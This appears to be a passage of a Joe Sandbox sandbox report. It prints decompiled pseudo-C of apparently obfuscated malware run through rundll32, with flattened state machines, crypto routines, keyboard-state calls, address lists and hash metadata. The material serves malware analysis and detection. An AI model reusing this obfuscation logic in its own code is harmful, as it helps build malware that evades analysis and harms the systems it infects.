				_v44 = 0xb19a36;
				_v44 = _v44 + 0xb2d2;
				_v44 = _v44 | 0xf7fdfee7;
				_v44 = _v44 ^ 0xf7fbe5a1;
				_v76 = 0x3b8058;
				_v76 = _v76 | 0x902cc23a;
				_v76 = _v76 ^ 0x903f9f8c;
				_t226 =  *0x19520c; // 0x0
				_t202 = E00184FA8(_v84, _t226 + 0x220, _v16, _v40);
				_t234 = _a4 + 0x2c;
				_t203 = E0018FC96(_v72, _v32, _a4 + 0x2c, _v48, _t202);
				_t243 = _t203;
				if(_t203 != 0) {
					_push(_v64);
					_push(_v24);
					_push(0x1710cc);
					E0017E7CE(E0017AB66(_v8, _v80, _t243), _t243, _v52,  *((intOrPtr*)(_a8 + 0x14)), _v8, _v20, _v68, _v56, _v12, _t234);
					E0017AE03(_v36, _v28, _v60, _t206);
					E0017BAB0( &_v616, _v44, _v76);
				}
				return 1;
			}

































                                                                                                                      0x0018d3d1
                                                                                                                      0x0018d3d7
                                                                                                                      0x0018d3de
                                                                                                                      0x0018d3e5
                                                                                                                      0x0018d3ec
                                                                                                                      0x0018d3f3
                                                                                                                      0x0018d3fa
                                                                                                                      0x0018d401
                                                                                                                      0x0018d40f
                                                                                                                      0x0018d410
                                                                                                                      0x0018d417
                                                                                                                      0x0018d41a
                                                                                                                      0x0018d421
                                                                                                                      0x0018d428
                                                                                                                      0x0018d42f
                                                                                                                      0x0018d436
                                                                                                                      0x0018d43d
                                                                                                                      0x0018d444
                                                                                                                      0x0018d44b
                                                                                                                      0x0018d44f
                                                                                                                      0x0018d456
                                                                                                                      0x0018d45d
                                                                                                                      0x0018d464
                                                                                                                      0x0018d46c
                                                                                                                      0x0018d46f
                                                                                                                      0x0018d476
                                                                                                                      0x0018d47d
                                                                                                                      0x0018d485
                                                                                                                      0x0018d488
                                                                                                                      0x0018d48f
                                                                                                                      0x0018d496
                                                                                                                      0x0018d49a
                                                                                                                      0x0018d49e
                                                                                                                      0x0018d4a5
                                                                                                                      0x0018d4ac
                                                                                                                      0x0018d4b3
                                                                                                                      0x0018d4b6
                                                                                                                      0x0018d4bd
                                                                                                                      0x0018d4c4
                                                                                                                      0x0018d4cf
                                                                                                                      0x0018d4d6
                                                                                                                      0x0018d4d9
                                                                                                                      0x0018d4e0
                                                                                                                      0x0018d4e7
                                                                                                                      0x0018d4ee
                                                                                                                      0x0018d4f5
                                                                                                                      0x0018d4fc
                                                                                                                      0x0018d500
                                                                                                                      0x0018d507
                                                                                                                      0x0018d50e
                                                                                                                      0x0018d515
                                                                                                                      0x0018d51c
                                                                                                                      0x0018d523
                                                                                                                      0x0018d52a
                                                                                                                      0x0018d531
                                                                                                                      0x0018d538
                                                                                                                      0x0018d53f
                                                                                                                      0x0018d546
                                                                                                                      0x0018d54d
                                                                                                                      0x0018d554
                                                                                                                      0x0018d55b
                                                                                                                      0x0018d562
                                                                                                                      0x0018d569
                                                                                                                      0x0018d570
                                                                                                                      0x0018d577
                                                                                                                      0x0018d57b
                                                                                                                      0x0018d582
                                                                                                                      0x0018d58f
                                                                                                                      0x0018d597
                                                                                                                      0x0018d59c
                                                                                                                      0x0018d5a4
                                                                                                                      0x0018d5a7
                                                                                                                      0x0018d5aa
                                                                                                                      0x0018d5b1
                                                                                                                      0x0018d5b8
                                                                                                                      0x0018d5bc
                                                                                                                      0x0018d5c3
                                                                                                                      0x0018d5c7
                                                                                                                      0x0018d5ce
                                                                                                                      0x0018d5d5
                                                                                                                      0x0018d5e0
                                                                                                                      0x0018d5e3
                                                                                                                      0x0018d5ea
                                                                                                                      0x0018d5f1
                                                                                                                      0x0018d5f8
                                                                                                                      0x0018d5ff
                                                                                                                      0x0018d606
                                                                                                                      0x0018d60d
                                                                                                                      0x0018d614
                                                                                                                      0x0018d621
                                                                                                                      0x0018d630
                                                                                                                      0x0018d63f
                                                                                                                      0x0018d646
                                                                                                                      0x0018d64e
                                                                                                                      0x0018d650
                                                                                                                      0x0018d653
                                                                                                                      0x0018d656
                                                                                                                      0x0018d65f
                                                                                                                      0x0018d68d
                                                                                                                      0x0018d69c
                                                                                                                      0x0018d6ad
                                                                                                                      0x0018d6b5
                                                                                                                      0x0018d6bd

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID: >T$X$1@$k>$txb$z_i0
                                                                                                                      • API String ID: 1586166983-1035483976
                                                                                                                      • Opcode ID: ad7e8996f14c6d6a4e0f922b7923654c4b6da3d1f74d9b8fad807ccf511f9401
                                                                                                                      • Instruction ID: 1efe9061170d557c48d52a39b2402e72296ccbe86d6a7a702677f4446bf6e5ac
                                                                                                                      • Opcode Fuzzy Hash: ad7e8996f14c6d6a4e0f922b7923654c4b6da3d1f74d9b8fad807ccf511f9401
                                                                                                                      • Instruction Fuzzy Hash: 1F91FEB2C00219ABCF18DFE5D98A8DEFBB1FF58308F208159E016B6260D7B55A45CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018542E Relevance: 6.4, Strings: 5, Instructions: 107COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0018542E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t103;
				void* _t104;
				void* _t107;
				signed int _t109;
				signed int _t110;
				void* _t119;
				void* _t120;
				signed int* _t122;

				_t122 =  &_v40;
				_v16 = 0x36dfa5;
				_v16 = _v16 + 0x3b08;
				_t107 = __ecx;
				_t119 = 0;
				_t109 = 0x6b;
				_v16 = _v16 / _t109;
				_v16 = _v16 ^ 0x0008b2f0;
				_t120 = 0x25318c3;
				_v32 = 0xe406cb;
				_v32 = _v32 + 0xf1ff;
				_v32 = _v32 << 0xd;
				_t110 = 0x38;
				_v32 = _v32 / _t110;
				_v32 = _v32 ^ 0x02d3dd20;
				_v36 = 0x75fef9;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 + 0x1d86;
				_v36 = _v36 | 0xca94675a;
				_v36 = _v36 ^ 0xca99002d;
				_v20 = 0xf78cd;
				_v20 = _v20 * 0x50;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x004e8f0d;
				_v24 = 0x451f1c;
				_v24 = _v24 + 0xffffecca;
				_v24 = _v24 + 0xffffe02c;
				_v24 = _v24 ^ 0x0044bfd9;
				_v40 = 0xfdbfec;
				_v40 = _v40 << 8;
				_v40 = _v40 + 0x2a17;
				_v40 = _v40 ^ 0x2ee485ab;
				_v40 = _v40 ^ 0xd32b8602;
				_v28 = 0xc36f29;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 + 0xffff93a5;
				_v28 = _v28 ^ 0xfffd5496;
				_v4 = 0xb22cca;
				_v4 = _v4 * 0x61;
				_v4 = _v4 ^ 0x438b1823;
				_v8 = 0x4d4bc7;
				_v8 = _v8 + 0xffff7d22;
				_v8 = _v8 ^ 0x00436970;
				_v12 = 0xfbac3c;
				_v12 = _v12 | 0x3e605f41;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0xefb5eaa0;
				do {
					while(_t120 != 0x25318c3) {
						if(_t120 == 0x409e50d) {
							_t103 = E0018274F();
							_t122 = _t122 - 0xc + 0xc;
							_t120 = 0x7f367f8;
							_t119 = _t119 + _t103;
							continue;
						} else {
							if(_t120 == 0x7f367f8) {
								_t104 = E0017B782(_t107 + 0xc, _v24, _v40, _v28);
								_t122 =  &(_t122[2]);
								_t120 = 0xdeee07a;
								_t119 = _t119 + _t104;
								continue;
							} else {
								if(_t120 != 0xdeee07a) {
									goto L10;
								} else {
									_t119 = _t119 + E0017B782(_t107 + 4, _v4, _v8, _v12);
								}
							}
						}
						L6:
						return _t119;
					}
					_t120 = 0x409e50d;
					L10:
				} while (_t120 != 0xb6d7b22);
				goto L6;
			}





















                                                                                                                      0x0018542e
                                                                                                                      0x00185431
                                                                                                                      0x0018543b
                                                                                                                      0x0018544d
                                                                                                                      0x0018544f
                                                                                                                      0x00185451
                                                                                                                      0x00185456
                                                                                                                      0x0018545c
                                                                                                                      0x00185464
                                                                                                                      0x00185469
                                                                                                                      0x00185476
                                                                                                                      0x0018547e
                                                                                                                      0x00185487
                                                                                                                      0x0018548a
                                                                                                                      0x0018548e
                                                                                                                      0x00185496
                                                                                                                      0x0018549e
                                                                                                                      0x001854a3
                                                                                                                      0x001854ab
                                                                                                                      0x001854b3
                                                                                                                      0x001854bb
                                                                                                                      0x001854c8
                                                                                                                      0x001854cc
                                                                                                                      0x001854d1
                                                                                                                      0x001854d9
                                                                                                                      0x001854e1
                                                                                                                      0x001854e9
                                                                                                                      0x001854f1
                                                                                                                      0x001854f9
                                                                                                                      0x00185501
                                                                                                                      0x00185506
                                                                                                                      0x0018550e
                                                                                                                      0x00185516
                                                                                                                      0x0018551e
                                                                                                                      0x00185526
                                                                                                                      0x0018552b
                                                                                                                      0x00185533
                                                                                                                      0x0018553b
                                                                                                                      0x00185548
                                                                                                                      0x0018554c
                                                                                                                      0x00185554
                                                                                                                      0x0018555c
                                                                                                                      0x00185564
                                                                                                                      0x0018556c
                                                                                                                      0x00185574
                                                                                                                      0x0018557c
                                                                                                                      0x00185581
                                                                                                                      0x00185589
                                                                                                                      0x00185589
                                                                                                                      0x00185593
                                                                                                                      0x001855fb
                                                                                                                      0x00185600
                                                                                                                      0x00185603
                                                                                                                      0x00185608
                                                                                                                      0x00000000
                                                                                                                      0x00185595
                                                                                                                      0x0018559b
                                                                                                                      0x001855d7
                                                                                                                      0x001855dc
                                                                                                                      0x001855df
                                                                                                                      0x001855e4
                                                                                                                      0x00000000
                                                                                                                      0x0018559d
                                                                                                                      0x001855a3
                                                                                                                      0x00000000
                                                                                                                      0x001855a5
                                                                                                                      0x001855bc
                                                                                                                      0x001855bc
                                                                                                                      0x001855a3
                                                                                                                      0x0018559b
                                                                                                                      0x001855be
                                                                                                                      0x001855c7
                                                                                                                      0x001855c7
                                                                                                                      0x0018560f
                                                                                                                      0x00185611
                                                                                                                      0x00185611
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$A_`>$piC$z$z
                                                                                                                      • API String ID: 0-2268621895
                                                                                                                      • Opcode ID: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction ID: de17437e19b8a6c836c9f328e18ae2ec46b72c7160ece8613b9e8402c68cca9f
                                                                                                                      • Opcode Fuzzy Hash: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction Fuzzy Hash: 73413AB29093029FC344DF25D58940BFBE2FBD4758F419A2DF49996250D774CA0A8F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B43F Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                      • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                      • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                      • SendMessageA.USER32 ref: 1001B48B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State$LongMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1063413437-0
                                                                                                                      • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                      • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00171F9B Relevance: 5.4, Strings: 4, Instructions: 413COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00171F9B(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr _t419;
				void* _t424;
				void* _t432;
				signed int _t435;
				void* _t444;
				intOrPtr* _t446;
				void* _t448;
				signed char* _t458;
				signed char* _t493;
				intOrPtr* _t498;
				intOrPtr _t499;
				intOrPtr _t500;
				void* _t501;
				signed char* _t502;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				intOrPtr _t513;
				void* _t514;
				void* _t515;
				void* _t519;

				_t498 = _a20;
				_t446 = __edx;
				_push(_t498);
				_push(_a16);
				_push(_a12);
				_v88 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(__ecx);
				_v236 = 0xf0db43;
				_t515 = _t514 + 0x1c;
				_v236 = _v236 + 0xffff6527;
				_v236 = _v236 ^ 0x37601acd;
				_t499 = 0;
				_v236 = _v236 >> 1;
				_t448 = 0xb503f3;
				_v236 = _v236 ^ 0x1bc82d53;
				_v140 = 0x2172ad;
				_v140 = _v140 + 0x5f16;
				_v140 = _v140 ^ 0x0021d183;
				_v124 = 0x27fcb3;
				_t504 = 0x21;
				_v124 = _v124 / _t504;
				_v124 = _v124 ^ 0x00013673;
				_v108 = 0x51f448;
				_t505 = 0x49;
				_v92 = 0;
				_v108 = _v108 * 0x2f;
				_v108 = _v108 ^ 0x0f088890;
				_v212 = 0xcc9eac;
				_v212 = _v212 + 0xffffe9a6;
				_v212 = _v212 / _t505;
				_v212 = _v212 + 0xffffa822;
				_v212 = _v212 ^ 0x000711be;
				_v220 = 0xbaa1b0;
				_t506 = 0x3a;
				_v220 = _v220 * 0x1b;
				_v220 = _v220 * 0x49;
				_v220 = _v220 << 0xd;
				_v220 = _v220 ^ 0x5bc66ad4;
				_v96 = 0x96051c;
				_v96 = _v96 * 0x64;
				_v96 = _v96 ^ 0x3a9f1857;
				_v144 = 0x7390a9;
				_v144 = _v144 + 0xe6fa;
				_v144 = _v144 ^ 0x007f1cdd;
				_v196 = 0xf57225;
				_v196 = _v196 >> 0xe;
				_v196 = _v196 + 0xffff98f0;
				_v196 = _v196 ^ 0x2c45e12b;
				_v196 = _v196 ^ 0xd3b3c009;
				_v204 = 0xadefc1;
				_v204 = _v204 >> 4;
				_v204 = _v204 | 0xb7bea7b8;
				_v204 = _v204 / _t506;
				_v204 = _v204 ^ 0x03274dc6;
				_v224 = 0x9d9cb1;
				_v224 = _v224 + 0xffffa27a;
				_v224 = _v224 + 0xffffee01;
				_v224 = _v224 + 0xffff764e;
				_v224 = _v224 ^ 0x0095b081;
				_v192 = 0x5eb987;
				_v192 = _v192 + 0xffff1159;
				_t507 = 0xe;
				_v192 = _v192 * 0x23;
				_v192 = _v192 + 0xffff653a;
				_v192 = _v192 ^ 0x0cdf46f4;
				_v104 = 0x141020;
				_v104 = _v104 << 6;
				_v104 = _v104 ^ 0x0502b476;
				_v168 = 0xc57d6d;
				_v168 = _v168 / _t507;
				_v168 = _v168 | 0x88578591;
				_v168 = _v168 ^ 0x8850307a;
				_v120 = 0x64bf72;
				_v120 = _v120 << 0xf;
				_v120 = _v120 ^ 0x5fbc8f9f;
				_v128 = 0xd63e1a;
				_v128 = _v128 + 0xffff0b7c;
				_v128 = _v128 ^ 0x00df6f35;
				_v136 = 0xd9491f;
				_v136 = _v136 + 0xffff8a09;
				_v136 = _v136 ^ 0x00d088a2;
				_v112 = 0xceb298;
				_v112 = _v112 + 0x36cc;
				_v112 = _v112 ^ 0x00c43f46;
				_v132 = 0x9f966b;
				_v132 = _v132 + 0xd61c;
				_v132 = _v132 ^ 0x00a3d2ff;
				_v216 = 0x70daad;
				_v216 = _v216 ^ 0xde964b68;
				_t508 = 0x3f;
				_v216 = _v216 * 0x49;
				_v216 = _v216 | 0xd3ab0205;
				_v216 = _v216 ^ 0xdfb04ca5;
				_v200 = 0xe4f811;
				_v200 = _v200 + 0xffffdd8f;
				_v200 = _v200 | 0x8a8b7b9c;
				_v200 = _v200 + 0xb2a2;
				_v200 = _v200 ^ 0x8af46931;
				_v244 = 0x65145a;
				_v244 = _v244 >> 4;
				_v244 = _v244 + 0x823b;
				_v244 = _v244 / _t508;
				_v244 = _v244 ^ 0x000ba257;
				_v184 = 0x53b52d;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 | 0x3ab2fca7;
				_v184 = _v184 >> 0xa;
				_v184 = _v184 ^ 0x00013efe;
				_v176 = 0x3e1c9c;
				_v176 = _v176 * 0x3f;
				_v176 = _v176 * 0x61;
				_v176 = _v176 ^ 0xcaa54878;
				_v172 = 0xb8475b;
				_v172 = _v172 >> 2;
				_v172 = _v172 + 0xffff45a9;
				_v172 = _v172 ^ 0x002df2ce;
				_v148 = 0x11eadc;
				_v148 = _v148 * 0x2c;
				_v148 = _v148 ^ 0x0312b4e7;
				_v228 = 0xd45ea;
				_v228 = _v228 + 0x1c9a;
				_v228 = _v228 ^ 0x843ee8f1;
				_v228 = _v228 + 0xffff47b4;
				_v228 = _v228 ^ 0x843da11a;
				_v116 = 0x7a0457;
				_t509 = 0x4d;
				_v116 = _v116 / _t509;
				_v116 = _v116 ^ 0x00002c66;
				_v232 = 0x7f0d8a;
				_v232 = _v232 + 0xa3a9;
				_v232 = _v232 + 0xf9ff;
				_v232 = _v232 >> 1;
				_v232 = _v232 ^ 0x0040e313;
				_v208 = 0x135f21;
				_v208 = _v208 | 0x41f85818;
				_t510 = 0x60;
				_v208 = _v208 * 0x65;
				_v208 = _v208 << 0xe;
				_v208 = _v208 ^ 0x245ebba3;
				_v240 = 0x80e1e4;
				_v240 = _v240 + 0x9e19;
				_v240 = _v240 * 0x1d;
				_v240 = _v240 + 0xa9b2;
				_v240 = _v240 ^ 0x0eacf51a;
				_v100 = 0x156d59;
				_v100 = _v100 + 0x8f40;
				_v100 = _v100 ^ 0x001bd2c0;
				_v152 = 0x95953b;
				_v152 = _v152 >> 7;
				_v152 = _v152 / _t510;
				_v152 = _v152 ^ 0x000ebfd6;
				_v180 = 0x897e25;
				_v180 = _v180 | 0x70565201;
				_t511 = 0x75;
				_v180 = _v180 / _t511;
				_v180 = _v180 << 0xd;
				_v180 = _v180 ^ 0xdf07d45f;
				_v160 = 0x7982fe;
				_t512 = 0x32;
				_t513 = _v88;
				_v160 = _v160 / _t512;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x4dcbb71a;
				_v188 = 0x3ea9a3;
				_v188 = _v188 >> 2;
				_v188 = _v188 * 0x4a;
				_v188 = _v188 * 0x27;
				_v188 = _v188 ^ 0xb0903fbe;
				_v164 = 0x944a5b;
				_v164 = _v164 << 9;
				_v164 = _v164 * 0x65;
				_v164 = _v164 ^ 0x02abce10;
				_v156 = 0x59a8bb;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 + 0x17fc;
				_v156 = _v156 ^ 0x000023b1;
				goto L1;
				do {
					while(1) {
						L1:
						_t519 = _t448 - 0x5a88f65;
						if(_t519 > 0) {
							break;
						}
						if(_t519 == 0) {
							_t500 =  *_t446;
							E0018FA99(_v112, _v132, _v216, _v200, _t500);
							_t501 = _t500 + _v124;
							E0018FD29(_v84, _v244, _t501, _v184, _v80);
							_t502 = _t501 + _v80;
							_push(_v148);
							_push(_v172);
							_push(_t513);
							E00175894(_t502, _v176);
							_t493 =  &(_t502[_t513]);
							_t515 = _t515 + 0x24;
							_t458 = _t502;
							if(_t502 >= _t493) {
								L15:
								_t432 = E0017EF71(0, 0xe);
								_t448 = 0x44ef61d;
								 *((char*)(_t432 + _t502)) = 0;
								_t499 = _v92;
								continue;
							} else {
								goto L12;
							}
							do {
								L12:
								if(( *_t458 & 0x000000ff) == _v236) {
									 *_t458 = 0xc3;
								}
								_t458 =  &(_t458[1]);
							} while (_t458 < _t493);
							goto L15;
						}
						if(_t448 == 0xb503f3) {
							_t448 = 0xf32de15;
							continue;
						}
						if(_t448 == 0x231aa40) {
							_t435 = E001845CD(_v192,  &_v76,  &_v84);
							asm("sbb ecx, ecx");
							_t448 = ( ~_t435 & 0xfac85eed) + 0xa894c28;
							continue;
						}
						if(_t448 == 0x44ef61d) {
							E001768DE(_v232, _v208, _v240, _v100, _v84);
							_t515 = _t515 + 0xc;
							_t448 = 0xa894c28;
							continue;
						}
						if(_t448 != 0x551ab15) {
							goto L28;
						}
						_t513 = E0017EF71(_v164, _v156);
						_t448 = 0xb847f8c;
						 *((intOrPtr*)(_t446 + 4)) = _v140 + _v80 + _t513;
					}
					if(_t448 == 0xa894c28) {
						E001768DE(_v152, _v180, _v160, _v188, _v76);
						_t515 = _t515 + 0xc;
						_t448 = 0x47d0478;
						goto L28;
					}
					if(_t448 == 0xb847f8c) {
						_push(_t448);
						_push(_t448);
						_t419 = E00183512( *((intOrPtr*)(_t446 + 4)));
						 *_t446 = _t419;
						if(_t419 == 0) {
							_t448 = 0x44ef61d;
						} else {
							_t448 = 0x5a88f65;
							_t499 = 1;
							_v92 = 1;
						}
						goto L1;
					}
					if(_t448 == 0xe73b6d2) {
						_v48 = _v88;
						_v52 = 0x20;
						_v56 =  &_v32;
						_v64 =  *_t498;
						_v60 =  *((intOrPtr*)(_t498 + 4));
						_t424 = E0018FF31( &_v76,  &_v68, _v144, _v196, _v204);
						_t515 = _t515 + 0xc;
						if(_t424 == 0) {
							break;
						}
						_t448 = 0x231aa40;
						goto L1;
					}
					if(_t448 != 0xf32de15) {
						goto L28;
					}
					_push( *_t498);
					_t444 = E00181831(_v212, _v220,  &_v32, _v96, _t448,  *((intOrPtr*)(_t498 + 4)));
					_t515 = _t515 + 0x18;
					if(_t444 == 0) {
						break;
					}
					_t448 = 0xe73b6d2;
					goto L1;
					L28:
				} while (_t448 != 0x47d0478);
				return _t499;
			}
















































































                                                                                                                      0x00171fa5
                                                                                                                      0x00171fac
                                                                                                                      0x00171fae
                                                                                                                      0x00171faf
                                                                                                                      0x00171fb8
                                                                                                                      0x00171fbf
                                                                                                                      0x00171fc6
                                                                                                                      0x00171fcd
                                                                                                                      0x00171fd4
                                                                                                                      0x00171fd5
                                                                                                                      0x00171fd6
                                                                                                                      0x00171fdb
                                                                                                                      0x00171fe3
                                                                                                                      0x00171fe6
                                                                                                                      0x00171ff0
                                                                                                                      0x00171ff8
                                                                                                                      0x00171ffa
                                                                                                                      0x00171ffe
                                                                                                                      0x00172003
                                                                                                                      0x0017200b
                                                                                                                      0x00172013
                                                                                                                      0x0017201b
                                                                                                                      0x00172023
                                                                                                                      0x00172037
                                                                                                                      0x0017203c
                                                                                                                      0x00172045
                                                                                                                      0x00172050
                                                                                                                      0x00172063
                                                                                                                      0x00172066
                                                                                                                      0x0017206d
                                                                                                                      0x00172074
                                                                                                                      0x0017207f
                                                                                                                      0x00172087
                                                                                                                      0x00172097
                                                                                                                      0x0017209b
                                                                                                                      0x001720a3
                                                                                                                      0x001720ab
                                                                                                                      0x001720b8
                                                                                                                      0x001720b9
                                                                                                                      0x001720c2
                                                                                                                      0x001720c6
                                                                                                                      0x001720cb
                                                                                                                      0x001720d3
                                                                                                                      0x001720e6
                                                                                                                      0x001720ed
                                                                                                                      0x001720f8
                                                                                                                      0x00172100
                                                                                                                      0x00172108
                                                                                                                      0x00172110
                                                                                                                      0x00172118
                                                                                                                      0x0017211d
                                                                                                                      0x00172125
                                                                                                                      0x0017212d
                                                                                                                      0x00172135
                                                                                                                      0x0017213d
                                                                                                                      0x00172142
                                                                                                                      0x00172150
                                                                                                                      0x00172154
                                                                                                                      0x0017215c
                                                                                                                      0x00172164
                                                                                                                      0x0017216c
                                                                                                                      0x00172176
                                                                                                                      0x0017217e
                                                                                                                      0x00172186
                                                                                                                      0x0017218e
                                                                                                                      0x0017219d
                                                                                                                      0x001721a0
                                                                                                                      0x001721a4
                                                                                                                      0x001721ac
                                                                                                                      0x001721b4
                                                                                                                      0x001721bf
                                                                                                                      0x001721c7
                                                                                                                      0x001721d2
                                                                                                                      0x001721e2
                                                                                                                      0x001721e6
                                                                                                                      0x001721ee
                                                                                                                      0x001721f6
                                                                                                                      0x00172201
                                                                                                                      0x00172209
                                                                                                                      0x00172214
                                                                                                                      0x0017221f
                                                                                                                      0x0017222a
                                                                                                                      0x00172235
                                                                                                                      0x00172240
                                                                                                                      0x0017224b
                                                                                                                      0x00172256
                                                                                                                      0x00172261
                                                                                                                      0x0017226c
                                                                                                                      0x00172277
                                                                                                                      0x00172282
                                                                                                                      0x0017228d
                                                                                                                      0x00172298
                                                                                                                      0x001722a0
                                                                                                                      0x001722ad
                                                                                                                      0x001722ae
                                                                                                                      0x001722b2
                                                                                                                      0x001722ba
                                                                                                                      0x001722c2
                                                                                                                      0x001722ca
                                                                                                                      0x001722d2
                                                                                                                      0x001722da
                                                                                                                      0x001722e2
                                                                                                                      0x001722ea
                                                                                                                      0x001722f2
                                                                                                                      0x001722f7
                                                                                                                      0x00172305
                                                                                                                      0x00172309
                                                                                                                      0x00172311
                                                                                                                      0x00172319
                                                                                                                      0x0017231e
                                                                                                                      0x00172326
                                                                                                                      0x0017232b
                                                                                                                      0x00172333
                                                                                                                      0x00172340
                                                                                                                      0x00172349
                                                                                                                      0x0017234d
                                                                                                                      0x00172355
                                                                                                                      0x0017235d
                                                                                                                      0x00172362
                                                                                                                      0x0017236a
                                                                                                                      0x00172372
                                                                                                                      0x0017237f
                                                                                                                      0x00172383
                                                                                                                      0x0017238b
                                                                                                                      0x00172393
                                                                                                                      0x0017239b
                                                                                                                      0x001723a3
                                                                                                                      0x001723ab
                                                                                                                      0x001723b3
                                                                                                                      0x001723c9
                                                                                                                      0x001723ce
                                                                                                                      0x001723d7
                                                                                                                      0x001723e2
                                                                                                                      0x001723ea
                                                                                                                      0x001723f2
                                                                                                                      0x001723fa
                                                                                                                      0x001723fe
                                                                                                                      0x00172406
                                                                                                                      0x0017240e
                                                                                                                      0x0017241b
                                                                                                                      0x0017241e
                                                                                                                      0x00172422
                                                                                                                      0x00172427
                                                                                                                      0x0017242f
                                                                                                                      0x00172437
                                                                                                                      0x00172444
                                                                                                                      0x00172448
                                                                                                                      0x00172450
                                                                                                                      0x00172458
                                                                                                                      0x00172463
                                                                                                                      0x0017246e
                                                                                                                      0x00172479
                                                                                                                      0x00172481
